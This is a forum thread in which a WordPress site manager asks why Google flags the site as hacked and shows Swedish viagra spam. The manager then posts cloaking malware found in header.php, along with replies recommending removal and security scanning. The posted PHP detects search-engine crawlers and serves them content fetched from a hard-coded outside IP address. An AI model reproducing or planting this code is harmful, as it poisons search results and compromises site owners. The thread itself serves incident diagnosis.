# Wordpress Website Hacked According to Google - Is It Really?

Tags: wordpress, debugging, search, google-search

I am the website manager for www.cuscalgary.ca. If you search "cus calgary" into google, there are a few links for my website that appear to have strange, seemingly Dutch strings in the link descriptions (see screenshot below) such as "köpa viagra snabb leverans". Also, I am getting the disreputable "This site may be hacked" message, right under my website's main link on Google.[image]

So far, I have tried inspecting the pages' code through Google Chrome's web browser and CTRL+F to find the words that are displaying on the search results (e.g., trying to find "Paul Junker" in the Contact Us page), I have tried downloading the theme folder and doing a "search through folder" function via notepad++ to find any of those weird strings. I have even tried going through the Wordpress Dashboard to look for any of these strings. Alas, I have found no sign of these strange strings.

I am starting to think that Google may just have not crawled my website in a while, and these strings have since been removed somehow. Although, I am doubtful that this is the case.

Has anyone had a similar experience to this that they found a solution for? If so, I would really appreciate hearing how you handled this nuisance.

Thank you so much for any help - all help is appreciated.

Kelsey

UPDATE:

I may have found the culprit in the header.php file. Check out the code I found at the start of the file below:

```
<?php

$user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#',

                               '#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i',

                               '#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i','#www\.cys\.ru#i',

                               '#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i',

                               '#CFNetwork#i', '#ConveraCrawler#i','#DISCo#i', '#Download\s*note#i', '#FAST\s*MetaWeb\s*Crawler#i',

                               '#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i',

                               '#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i',

                               '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i',

                               '#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i',

                               '#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i',

                               '#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i',

                               '#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i',

                               '#Yandex#i', '#Yanga#i', '#Yeti#i','#msnbot#i',

                               '#spider#i', '#yahoo#i', '#jeeves#i' ,'#google#i' ,'#altavista#i',

                               '#scooter#i' ,'#av\s*fetch#i' ,'#asterias#i' ,'#spiderthread revision#i' ,'#sqworm#i',

                               '#ask#i' ,'#lycos.spider#i' ,'#infoseek sidewinder#i' ,'#ultraseek#i' ,'#polybot#i',

                               '#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i',

                               '#charlotte#i', '#ngb#i', '#BingBot#i' ) ;



if ( !empty( $_SERVER['HTTP_USER_AGENT'] ) && ( FALSE !== strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) ){

    $isbot = 1;

    }



if( FALSE !== strpos( gethostbyaddr($_SERVER['REMOTE_ADDR']), 'google')) 

{

    $isbot = 1;

}



if(@$isbot){



$_SERVER[HTTP_USER_AGENT] = str_replace(" ", "-", $_SERVER[HTTP_USER_AGENT]);

$ch = curl_init();    

    curl_setopt($ch, CURLOPT_URL, "http://173.236.65.24/cakes/?useragent=$_SERVER[HTTP_USER_AGENT]&domain=$_SERVER[HTTP_HOST]");   

    $result = curl_exec($ch);       

curl_close ($ch);  



    echo $result;

}

?><!DOCTYPE html>
```

Comment: I don't see any of those strings in your website's HTML. I suggest you wait for a few days and see if Google updates the search results. As for the hack thing, if other people in your company have access to this website consider asking them if they changed anything.

Comment: That would do it.

Comment: Removing it is still only part of it. You'll need to implement a solution to mitigate the risk of it from happening again. If you're on a shared server, it's more difficult, since there are directory traversal tools that allow other people to access your site from elsewhere on the server by uploading it to a different account and gaining shell access. But there are some good security tools for WP. Definitely check out Wordfence (there are free and paid versions) and make regular backups.

Answer (score 2, accepted):

It's possible, yes. But without access to the site itself, it's difficult to say just from the search results you listed.

Install something like Wordfence (which I love) and let it scan your site. It should do a compare between the files on your server and the files at the WP repo and alert you if anything has been changed. It may even tell you some other things you didn't know.